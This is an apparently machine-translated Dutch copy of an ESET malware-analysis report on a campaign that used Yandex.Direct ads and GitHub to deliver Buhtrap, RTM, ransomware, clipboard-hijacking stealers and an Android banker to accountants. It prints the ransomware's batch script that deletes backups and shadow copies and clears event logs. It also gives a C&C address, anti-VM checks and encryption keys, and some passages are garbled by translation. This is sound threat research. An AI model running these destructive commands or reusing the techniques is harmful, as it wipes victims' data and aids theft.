Om accountants te targeten bij een cyberaanval, kunt u werkdocumenten gebruiken waar ze online naar zoeken. Dit is grofweg wat een cybergroep de afgelopen maanden heeft gedaan door bekende achterdeurtjes te verspreiden. и , evenals encryptors en software voor het stelen van cryptocurrencies. De meeste doelwitten bevinden zich in Rusland. De aanval werd uitgevoerd door kwaadaardige advertenties op Yandex.Direct te plaatsen. Potentiële slachtoffers werden doorverwezen naar een website waar hen werd gevraagd een kwaadaardig bestand te downloaden, vermomd als documentsjabloon. Yandex verwijderde de kwaadaardige advertenties na onze waarschuwing.
De broncode van Buhtrap is in het verleden online gelekt, zodat iedereen deze kan gebruiken. We hebben geen informatie over de beschikbaarheid van RTM-codes.
In dit bericht vertellen we je hoe de aanvallers malware verspreidden met behulp van Yandex.Direct en deze op GitHub hostten. Het bericht wordt afgesloten met een technische analyse van de malware.
Buhtrap en RTM zijn weer actief
Mechanisme van verspreiding en slachtoffers
De verschillende ladingen die aan de slachtoffers worden afgeleverd, delen een gemeenschappelijk verspreidingsmechanisme. Alle kwaadaardige bestanden die door de aanvallers waren gemaakt, werden in twee verschillende GitHub-opslagplaatsen geplaatst.
Meestal bevatte de repository één downloadbaar schadelijk bestand, dat regelmatig veranderde. Omdat je met GitHub de geschiedenis van wijzigingen in een repository kunt bekijken, kunnen we zien welke malware er gedurende een bepaalde periode is verspreid. Om het slachtoffer ervan te overtuigen het kwaadaardige bestand te downloaden, werd de website blanki-shabloni24[.]ru, weergegeven in de figuur hierboven, gebruikt.
Het ontwerp van de site en alle namen van de kwaadaardige bestanden volgen één enkel concept: formulieren, sjablonen, contracten, voorbeelden, enz. Aangezien Buhtrap- en RTM-software in het verleden al is gebruikt bij aanvallen op accountants, gingen we ervan uit dat de strategie in de nieuwe campagne is hetzelfde. De enige vraag is hoe het slachtoffer op de website van de aanvallers terecht is gekomen.
infectie
Minstens meerdere potentiële slachtoffers die op deze site terechtkwamen, werden aangetrokken door kwaadaardige advertenties. Hieronder vindt u een voorbeeld-URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Zoals je kunt zien aan de link, is de banner geplaatst op het legitieme boekhoudforum bb.f2[.]kz. Het is belangrijk op te merken dat de banners op verschillende sites verschenen, allemaal dezelfde campagne-ID hadden (blanki_rsya) en dat de meeste betrekking hadden op boekhoudkundige of juridische bijstandsdiensten. Uit de URL blijkt dat het potentiële slachtoffer het verzoek ‘factuurformulier downloaden’ heeft gebruikt, wat onze hypothese van gerichte aanvallen ondersteunt. Hieronder staan de sites waar de banners verschenen en de bijbehorende zoekopdrachten.
- factuurformulier downloaden – bb.f2[.]kz
- voorbeeldovereenkomst - Iopen[.]ru
- voorbeeld van een aanvraagklacht - 77metrov[.]ru
- overeenkomstformulier - blank-dogovor-kupli-prodazhi[.]ru
- voorbeeld verzoekschrift van de rechtbank - zen.yandex[.]ru
- voorbeeldklacht - yurday[.]ru
- voorbeeldcontractformulieren – Regforum[.]ru
- contractvorm – assistentus[.]ru
- voorbeeld appartementovereenkomst – napravah[.]com
- voorbeelden van juridische contracten - avito[.]ru
De blanki-shabloni24[.]ru-site is mogelijk geconfigureerd om een eenvoudige visuele beoordeling te doorstaan. Normaal gesproken lijkt een advertentie die verwijst naar een professioneel ogende site met een link naar GitHub niet duidelijk slecht. Bovendien hebben de aanvallers slechts gedurende een beperkte periode schadelijke bestanden naar de repository geüpload, waarschijnlijk tijdens de campagne. Meestal bevatte de GitHub-repository een leeg zip-archief of een leeg EXE-bestand. Zo konden aanvallers via Yandex.Direct advertenties verspreiden op sites die hoogstwaarschijnlijk werden bezocht door accountants die kwamen als reactie op specifieke zoekopdrachten.
Laten we vervolgens eens kijken naar de verschillende payloads die op deze manier worden gedistribueerd.
Analyse van de lading
Chronologie van de distributie
De kwaadaardige campagne begon eind oktober 2018 en is actief op het moment van schrijven. Omdat de hele repository publiekelijk beschikbaar was op GitHub, hebben we een nauwkeurige tijdlijn samengesteld van de verspreiding van zes verschillende malwarefamilies (zie onderstaande figuur). We hebben een regel toegevoegd die laat zien wanneer de bannerlink werd ontdekt, zoals gemeten door ESET-telemetrie, ter vergelijking met de git-geschiedenis. Zoals je kunt zien, correleert dit goed met de beschikbaarheid van de payload op GitHub. De discrepantie eind februari kan worden verklaard door het feit dat we geen deel van de wijzigingsgeschiedenis hadden, omdat de repository uit GitHub werd verwijderd voordat we deze volledig konden krijgen.
Figuur 1. Chronologie van de verspreiding van malware.
Code Signing-certificaten
Bij de campagne zijn meerdere certificaten gebruikt. Sommige waren ondertekend door meer dan één malwarefamilie, wat er verder op wijst dat verschillende monsters tot dezelfde campagne behoorden. Ondanks de beschikbaarheid van de privésleutel ondertekenden operators de binaire bestanden niet systematisch en gebruikten ze de sleutel niet voor alle monsters. Eind februari 2019 begonnen aanvallers ongeldige handtekeningen te maken met behulp van een certificaat van Google waarvan ze niet over de privésleutel beschikten.
Alle certificaten die betrokken zijn bij de campagne en de malwarefamilies die ze ondertekenen, staan vermeld in de onderstaande tabel.
We hebben deze code-ondertekeningscertificaten ook gebruikt om koppelingen met andere malwarefamilies tot stand te brengen. Voor de meeste certificaten hebben we geen voorbeelden gevonden die niet via een GitHub-repository zijn gedistribueerd. Het TOV “MARIYA”-certificaat werd echter gebruikt om malware van het botnet te ondertekenen , adware en mijnwerkers. Het is onwaarschijnlijk dat deze malware verband houdt met deze campagne. Hoogstwaarschijnlijk is het certificaat op het darknet gekocht.
Win32/Filecoder.Buhtrap
Het eerste onderdeel dat onze aandacht trok was het nieuw ontdekte Win32/Filecoder.Buhtrap. Dit is een binair Delphi-bestand dat soms in een pakket zit. Het werd voornamelijk verspreid in februari-maart 2019. Het gedraagt zich zoals het een ransomware-programma betaamt: het doorzoekt lokale schijven en netwerkmappen en codeert de gedetecteerde bestanden. Er is geen internetverbinding nodig om in gevaar te komen, omdat het geen contact maakt met de server om coderingssleutels te verzenden. In plaats daarvan voegt het een “token” toe aan het einde van het losgeldbericht en stelt het voor om e-mail of Bitmessage te gebruiken om contact op te nemen met de operators.
Om zoveel mogelijk gevoelige bronnen te versleutelen, voert Filecoder.Buhtrap een thread uit die is ontworpen om belangrijke software af te sluiten die mogelijk open bestandshandlers heeft die waardevolle informatie bevatten die de codering zou kunnen verstoren. De doelprocessen zijn voornamelijk databasemanagementsystemen (DBMS). Bovendien verwijdert Filecoder.Buhtrap logbestanden en back-ups om gegevensherstel moeilijk te maken. Om dit te doen, voert u het onderstaande batchscript uit.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap maakt gebruik van een legitieme online IP Logger-service die is ontworpen om informatie over websitebezoekers te verzamelen. Dit is bedoeld om slachtoffers van de ransomware te volgen, wat de verantwoordelijkheid is van de opdrachtregel:
mshta.exe "javascript:document.write('');"
Bestanden voor codering worden geselecteerd als ze niet overeenkomen met drie uitsluitingslijsten. Ten eerste worden bestanden met de volgende extensies niet versleuteld: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys en .knuppel. Ten tweede worden alle bestanden waarvan het volledige pad directorystrings uit de onderstaande lijst bevat, uitgesloten.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Ten derde zijn bepaalde bestandsnamen ook uitgesloten van versleuteling, waaronder de bestandsnaam van het losgeldbericht. De lijst wordt hieronder weergegeven. Uiteraard zijn al deze uitzonderingen bedoeld om de machine draaiende te houden, maar met minimale technische staat.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Bestandsversleutelingsschema
Eenmaal uitgevoerd genereert de malware een 512-bits RSA-sleutelpaar. De privé-exponent (d) en modulus (n) worden vervolgens gecodeerd met een hardgecodeerde openbare sleutel van 2048 bits (openbare exponent en modulus), zlib-verpakt en base64-gecodeerd. De code die hiervoor verantwoordelijk is, wordt weergegeven in figuur 2.
Figuur 2. Resultaat van Hex-Rays-decompilatie van het proces voor het genereren van 512-bits RSA-sleutelparen.
Hieronder ziet u een voorbeeld van platte tekst met een gegenereerde privésleutel, een token dat aan het losgeldbericht is gekoppeld.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Hieronder vindt u de openbare sleutel van de aanvallers.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
De bestanden worden gecodeerd met AES-128-CBC met een 256-bits sleutel. Voor elk gecodeerd bestand worden een nieuwe sleutel en een nieuwe initialisatievector gegenereerd. De sleutelinformatie wordt toegevoegd aan het einde van het gecodeerde bestand. Laten we eens kijken naar het formaat van het gecodeerde bestand.
Gecodeerde bestanden hebben de volgende header:
De bronbestandsgegevens met toevoeging van de VEGA Magic-waarde worden gecodeerd tot de eerste 0x5000 bytes. Alle decoderingsinformatie is toegevoegd aan een bestand met de volgende structuur:
- De markering voor de bestandsgrootte bevat een markering die aangeeft of het bestand groter is dan 0x5000 bytes
— AES-sleutelblob = ZlibCompress(RSAEncrypt(AES-sleutel + IV, openbare sleutel van het gegenereerde RSA-sleutelpaar))
- RSA-sleutelblob = ZlibCompress(RSAEncrypt(gegenereerde RSA-privésleutel, hardgecodeerde openbare RSA-sleutel))
Win32/ClipBanker
Win32/ClipBanker is een component die van eind oktober tot begin december 2018 met tussenpozen werd verspreid. Zijn rol is het monitoren van de inhoud van het klembord, het zoekt naar adressen van cryptocurrency-portefeuilles. Nadat het doelportemonnee-adres is bepaald, vervangt ClipBanker dit door een adres waarvan wordt aangenomen dat het aan de operators toebehoort. De monsters die we onderzochten waren noch in dozen, noch versluierd. Het enige mechanisme dat wordt gebruikt om gedrag te maskeren is string-encryptie. De adressen van de operatorportemonnee worden gecodeerd met RC4. Doelcryptocurrencies zijn Bitcoin, Bitcoin cash, Dogecoin, Ethereum en Ripple.
Gedurende de periode dat de malware zich verspreidde naar de Bitcoin-portemonnees van de aanvallers, werd een klein bedrag naar VTS gestuurd, wat twijfel doet rijzen over het succes van de campagne. Bovendien zijn er geen aanwijzingen dat deze transacties überhaupt verband hielden met ClipBanker.
Win32/RTM
De Win32/RTM-component werd begin maart 2019 gedurende meerdere dagen verspreid. RTM is een Trojaanse bankier geschreven in Delphi, gericht op banksystemen op afstand. In 2017 publiceerden ESET-onderzoekers van dit programma is de beschrijving nog steeds relevant. In januari 2019 kwam ook Palo Alto Networks uit .
Buhtrap-lader
Er was al een tijdje een downloader beschikbaar op GitHub die niet vergelijkbaar was met eerdere Buhtrap-tools. Hij draait zich om https://94.100.18[.]67/RSS.php?<some_id> om naar de volgende fase te gaan en deze rechtstreeks in het geheugen te laden. We kunnen twee gedragingen van de tweede fasecode onderscheiden. In de eerste URL passeerde RSS.php rechtstreeks de achterdeur van Buhtrap - deze achterdeur lijkt sterk op de achterdeur die beschikbaar was nadat de broncode was gelekt.
Interessant genoeg zien we verschillende campagnes met de Buhtrap-achterdeur, en deze worden naar verluidt door verschillende operators beheerd. In dit geval is het belangrijkste verschil dat de achterdeur rechtstreeks in het geheugen wordt geladen en niet het gebruikelijke schema gebruikt met het DLL-implementatieproces waar we het over hadden . Bovendien hebben de operators de RC4-sleutel gewijzigd die wordt gebruikt om het netwerkverkeer naar de C&C-server te coderen. In de meeste campagnes die we hebben gezien, namen operators niet de moeite om deze sleutel te wijzigen.
Het tweede, complexere gedrag was dat de RSS.php-URL werd doorgegeven aan een andere lader. Het implementeerde enige verduistering, zoals het opnieuw opbouwen van de dynamische importtabel. Het doel van de bootloader is om contact te maken met de C&C-server [.]com/api/F27F84EDA4D13B15/2, stuur de logs en wacht op een reactie. Het verwerkt het antwoord als een blob, laadt het in het geheugen en voert het uit. De lading die we zagen bij het uitvoeren van deze lader was dezelfde Buhtrap-achterdeur, maar er kunnen andere componenten zijn.
Android/Spy.Banker
Interessant genoeg werd er ook een component voor Android gevonden in de GitHub-repository. Hij was slechts één dag in de hoofdvestiging: 1 november 2018. Behalve dat het op GitHub is geplaatst, vindt ESET-telemetrie geen bewijs dat deze malware wordt verspreid.
Het onderdeel werd gehost als een Android-applicatiepakket (APK). Het is zwaar versluierd. Het kwaadaardige gedrag is verborgen in een gecodeerde JAR die zich in de APK bevindt. Het is gecodeerd met RC4 met behulp van deze sleutel:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Dezelfde sleutel en hetzelfde algoritme worden gebruikt om tekenreeksen te coderen. JAR is gevestigd in APK_ROOT + image/files. De eerste 4 bytes van het bestand bevatten de lengte van de gecodeerde JAR, die onmiddellijk na het lengteveld begint.
Nadat we het bestand hadden gedecodeerd, ontdekten we dat het eerder Anubis was bankier voor Android. De malware heeft de volgende kenmerken:
- opnemen vanaf een microfoon
- schermafbeeldingen maken
- GPS-coördinaten verkrijgen
- keylogger
- encryptie van apparaatgegevens en vraag om losgeld
- spammen
Interessant is dat de bankier Twitter gebruikte als back-upcommunicatiekanaal om een andere C&C-server te verkrijgen. Het monster dat we hebben geanalyseerd, gebruikte het @JonesTrader-account, maar op het moment van analyse was het al geblokkeerd.
De bankier bevat een lijst met doelapplicaties op het Android-apparaat. Het is langer dan de lijst die in het Sophos-onderzoek is verkregen. De lijst bevat veel bankapplicaties, online winkelprogramma's zoals Amazon en eBay, en cryptocurrency-diensten.
MSIL/ClipBanker.IH
Het laatste onderdeel dat als onderdeel van deze campagne werd verspreid, was het uitvoerbare bestand .NET Windows, dat in maart 2019 verscheen. De meeste van de onderzochte versies waren verpakt met ConfuserEx v1.0.0. Net als ClipBanker gebruikt deze component het klembord. Zijn doel is een breed scala aan cryptocurrencies, evenals aanbiedingen op Steam. Bovendien gebruikt hij de IP Logger-service om de privé-WIF-sleutel van Bitcoin te stelen.
Beschermingsmechanismen
Naast de voordelen die ConfuserEx biedt bij het voorkomen van foutopsporing, dumpen en knoeien, omvat het onderdeel de mogelijkheid om antivirusproducten en virtuele machines te detecteren.
Om te verifiëren dat de malware op een virtuele machine draait, gebruikt de malware de ingebouwde Windows WMI-opdrachtregel (WMIC) om BIOS-informatie op te vragen, namelijk:
wmic bios
Vervolgens parseert het programma de opdrachtuitvoer en zoekt naar trefwoorden: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Om antivirusproducten te detecteren, verzendt malware een Windows Management Instrumentation (WMI)-verzoek naar Windows Security Center met behulp van ManagementObjectSearcher API zoals hieronder weergegeven. Na het decoderen vanuit base64 ziet de oproep er als volgt uit:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Figuur 3. Proces voor het identificeren van antivirusproducten.
Bovendien controleert de malware of , een hulpmiddel om te beschermen tegen klembordaanvallen en, indien actief, alle threads in dat proces op te schorten, waardoor de bescherming wordt uitgeschakeld.
Vasthoudendheid
De versie van de malware die we hebben onderzocht kopieert zichzelf %APPDATA%googleupdater.exe en stelt het “verborgen” attribuut in voor de Google-directory. Vervolgens verandert ze de waarde SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell in het Windows-register en voegt het pad toe updater.exe. Op deze manier wordt de malware uitgevoerd telkens wanneer de gebruiker inlogt.
Kwaadaardig gedrag
Net als ClipBanker controleert de malware de inhoud van het klembord en zoekt naar adressen van cryptocurrency-portemonnees, en vervangt deze wanneer deze wordt gevonden door een van de adressen van de operator. Hieronder vindt u een lijst met doeladressen op basis van wat er in de code staat.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Voor elk type adres is er een overeenkomstige reguliere expressie. De STEAM_URL-waarde wordt gebruikt om het Steam-systeem aan te vallen, zoals blijkt uit de reguliere expressie die wordt gebruikt om in de buffer te definiëren:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Exfiltratiekanaal
Naast het vervangen van adressen in de buffer, richt de malware zich ook op de privé WIF-sleutels van Bitcoin-, Bitcoin Core- en Electrum Bitcoin-wallets. Het programma gebruikt plogger.org als exfiltratiekanaal om de privésleutel van WIF te verkrijgen. Om dit te doen, voegen operators privésleutelgegevens toe aan de User-Agent HTTP-header, zoals hieronder weergegeven.
Figuur 4. IP Logger-console met uitvoergegevens.
Operators gebruikten iplogger.org niet om portemonnees te exfiltreren. Ze hebben waarschijnlijk hun toevlucht genomen tot een andere methode vanwege de limiet van 255 tekens in het veld User-Agentweergegeven in de IP Logger-webinterface. In de voorbeelden die we hebben bestudeerd, werd de andere uitvoerserver opgeslagen in de omgevingsvariabele DiscordWebHook. Verrassend genoeg wordt deze omgevingsvariabele nergens in de code toegewezen. Dit suggereert dat de malware nog in ontwikkeling is en dat de variabele is toegewezen aan de testmachine van de operator.
Er is nog een teken dat het programma in ontwikkeling is. Het binaire bestand bevat twee iplogger.org-URL's, en beide worden opgevraagd wanneer gegevens worden geëxfiltreerd. Bij een verzoek aan een van deze URL’s wordt de waarde in het veld Verwijzend voorafgegaan door “DEV /”. We hebben ook een versie gevonden die niet is verpakt met ConfuserEx. De ontvanger voor deze URL heet DevFeedbackUrl. Op basis van de naam van de omgevingsvariabele denken we dat de operators van plan zijn de legitieme dienst Discord en zijn webonderscheppingssysteem te gebruiken om cryptocurrency-portefeuilles te stelen.
Conclusie
Deze campagne is een voorbeeld van het gebruik van legitieme advertentiediensten bij cyberaanvallen. Het plan richt zich op Russische organisaties, maar het zou ons niet verbazen als een dergelijke aanval gebruik maakt van niet-Russische diensten. Om compromissen te voorkomen, moeten gebruikers vertrouwen hebben in de reputatie van de bron van de software die ze downloaden.
Een volledige lijst met indicatoren van compromis- en MITRE ATT&CK-attributen is beschikbaar op .
Bron: www.habr.com